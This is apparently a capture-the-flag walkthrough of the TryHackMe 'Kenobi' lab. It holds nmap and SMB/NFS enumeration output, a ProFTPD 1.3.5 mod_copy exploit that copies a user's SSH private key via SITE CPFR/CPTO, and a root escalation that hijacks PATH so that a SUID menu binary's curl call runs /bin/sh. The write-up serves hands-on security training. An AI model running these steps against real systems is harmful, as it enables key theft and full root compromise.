THM - Kenobi
March 6, 2022•924 words
Kenobi
skibum 8/29/2020
Recon
NMAP scans
Scan for open ports and understand what is avaible.
nmap -A -oN nmap/FullScan <Machine_IP> Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 06:56 CDT Nmap scan report for <Machine_IP> Host is up (0.20s latency). Not shown: 990 closed ports PORT STATE SERVICE VERSION 21/tcp open ftp ProFTPD 1.3.5 22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.7 (Ubuntu Linux; protocol 2.0) | ssh-hostkey: | 2048 b3:ad:83:41:49:e9:5d:16:8d:3b:0f:05:7b:e2:c0:ae (RSA) | 256 f8:27:7d:64:29:97:e6:f8:65:54:65:22:f7:c8:1d:8a (ECDSA) |_ 256 5a:06:ed:eb:b6:56:7e:4c:01:dd:ea:bc:ba:fa:33:79 (ED25519) 80/tcp open http Apache httpd 2.4.18 ((Ubuntu)) | http-robots.txt: 1 disallowed entry |_/admin.html |_http-server-header: Apache/2.4.18 (Ubuntu) |_http-title: Site doesn't have a title (text/html). 111/tcp open rpcbind 2-4 (RPC #100000) | rpcinfo: | program version port/proto service | 100000 2,3,4 111/tcp rpcbind | 100000 2,3,4 111/udp rpcbind | 100000 3,4 111/tcp6 rpcbind | 100000 3,4 111/udp6 rpcbind | 100003 2,3,4 2049/tcp nfs | 100003 2,3,4 2049/tcp6 nfs | 100003 2,3,4 2049/udp nfs | 100003 2,3,4 2049/udp6 nfs | 100005 1,2,3 36173/udp mountd | 100005 1,2,3 38913/tcp6 mountd | 100005 1,2,3 43825/udp6 mountd | 100005 1,2,3 44273/tcp mountd | 100021 1,3,4 37709/tcp nlockmgr | 100021 1,3,4 44971/tcp6 nlockmgr | 100021 1,3,4 46911/udp nlockmgr | 100021 1,3,4 49498/udp6 nlockmgr | 100227 2,3 2049/tcp nfs_acl | 100227 2,3 2049/tcp6 nfs_acl | 100227 2,3 2049/udp nfs_acl |_ 100227 2,3 2049/udp6 nfs_acl 139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP) 445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP) 1666/tcp filtered netview-aix-6 1801/tcp filtered msmq 2049/tcp filtered nfs 3703/tcp filtered adobeserver-3 Service Info: Host: KENOBI; OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel Host script results: |_clock-skew: mean: 1h40m00s, deviation: 2h53m12s, median: 0s |_nbstat: NetBIOS name: KENOBI, NetBIOS user: <unknown>, NetBIOS MAC: <unknown> (unknown) | smb-os-discovery: | OS: Windows 6.1 (Samba 4.3.11-Ubuntu) | Computer name: kenobi | NetBIOS computer name: KENOBI\x00 | Domain name: \x00 | FQDN: kenobi |_ System time: 2020-08-29T06:56:47-05:00 | smb-security-mode: | account_used: guest | authentication_level: user | challenge_response: supported |_ message_signing: disabled (dangerous, but default) | smb2-security-mode: | 2.02: |_ Message signing enabled but not required | smb2-time: | date: 2020-08-29T11:56:47 |_ start_date: N/A Service detection performed. Please report any incorrect results at https://nmap.org/submit/ . Nmap done: 1 IP address (1 host up) scanned in 40.34 seconds
Knowing that SMB and RPC are avaibe lets script scan SMB first.
nmap -p 445 --script=smb-enum-shares.nse,smb-enum-users.nse <Machine_IP> -oN nmap/smb445 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:44 CDT Nmap scan report for<Machine_IP> Host is up (0.21s latency). PORT STATE SERVICE 445/tcp open microsoft-ds Host script results: | smb-enum-shares: | account_used: guest | \\1<Machine_IP>\IPC$: | Type: STYPE_IPC_HIDDEN | Comment: IPC Service (kenobi server (Samba, Ubuntu)) | Users: 1 | Max Users: <unlimited> | Path: C:\tmp | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\<Machine_IP>\anonymous: | Type: STYPE_DISKTREE | Comment: | Users: 0 | Max Users: <unlimited> | Path: C:\home\kenobi\share | Anonymous access: READ/WRITE | Current user access: READ/WRITE | \\1<Machine_IP>\print$: | Type: STYPE_DISKTREE | Comment: Printer Drivers | Users: 0 | Max Users: <unlimited> | Path: C:\var\lib\samba\printers | Anonymous access: <none> |_ Current user access: <none> |_smb-enum-users: ERROR: Script execution failed (use -d to debug) Nmap done: 1 IP address (1 host up) scanned in 43.14 seconds
Now lets script scan RPC.
nmap -p 111 --script=nfs-ls,nfs-statfs,nfs-showmount <Machine_IP> -oN nmap/rpc111 Starting Nmap 7.80 ( https://nmap.org ) at 2020-08-29 07:47 CDT Nmap scan report for 10.10.1.115 Host is up (0.30s latency). PORT STATE SERVICE 111/tcp open rpcbind | nfs-showmount: |_ /var * Nmap done: 1 IP address (1 host up) scanned in 2.33 seconds
SMB client
Smb client
smbclient //<Machine_IP>/Anonymous Enter WORKGROUP\skibum's password: Try "help" to get a list of possible commands. smb: \> ls . D 0 Wed Sep 4 05:49:09 2019 .. D 0 Wed Sep 4 05:56:07 2019 log.txt N 12237 Wed Sep 4 05:49:09 2019 9204224 blocks of size 1024. 6877100 blocks available smb: \> get log.txt getting file \log.txt of size 12237 as log.txt (12.2 KiloBytes/sec) (average 12.2 KiloBytes/sec) smb: \> exit
cat log.txt
## FTP
1. Try and connect on the FTP
netcat 21
220 ProFTPD 1.3.5 Server (ProFTPD Default Installation) []
SITE CPFR /home/kenobi/.ssh/idrsa
350 File or directory exists, ready for destination name
SITE CPTO /var/tmp/idrsa
250 Copy successful
2. Exploit proFTPD 1.3.5
mkdir /mnt/kenobiNFS
mount :/var /mnt/kenobiNFS
ls -la /mnt/kenobiNFS
3. ssh into the machnine
ssh -i idrsa kenobi@<MachineIP>
## priv esc
1. Find SUID files
``` bash
find / -perm /4000 -type f 2>/dev/null
Look for somthing that stands out.
- /sbin/mount.nfs
- /usr/lib/policykit-1/polkit-agent-helper-1
- /usr/lib/dbus-1.0/dbus-daemon-launch-helper
- /usr/lib/snapd/snap-confine
- /usr/lib/eject/dmcrypt-get-device
- /usr/lib/openssh/ssh-keysign
- /usr/lib/x86_64-linux-gnu/lxc/lxc-user-nic
- /usr/bin/chfn
- /usr/bin/newgidmap
- /usr/bin/pkexec
- /usr/bin/passwd
- /usr/bin/newuidmap
- /usr/bin/gpasswd
- /usr/bin/menu
- /usr/bin/sudo
- /usr/bin/chsh
- /usr/bin/at
- /usr/bin/newgrp
- /bin/umount
- /bin/fusermount
- /bin/mount
- /bin/ping
- /bin/su
- /bin/ping6
run and check out the binary that stands out.
1. status check 2. kernel version 3. ifconfig ** Enter your choice :1 HTTP/1.1 200 OK Date: Sat, 29 Aug 2020 17:51:48 GMT Server: Apache/2.4.18 (Ubuntu) Last-Modified: Wed, 04 Sep 2019 09:07:20 GMT ETag: "c8-591b6884b6ed2" Accept-Ranges: bytes Content-Length: 200 Vary: Accept-Encoding Content-Type: text/html
Note that status check runs a curl command, can we overrite the path and machine?
Try and overwrite the machine curl command.
echo /bin/sh > curl chmod 777 curl export PATH=/tmp:$PATH /usr/bin/menu
- status check
- kernel version
- ifconfig ** Enter your choice :1 # id uid=0(root) gid=1000(kenobi) groups=1000(kenobi),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),110(lxd),113(lpadmin),114(sambashare) # whoami root # ```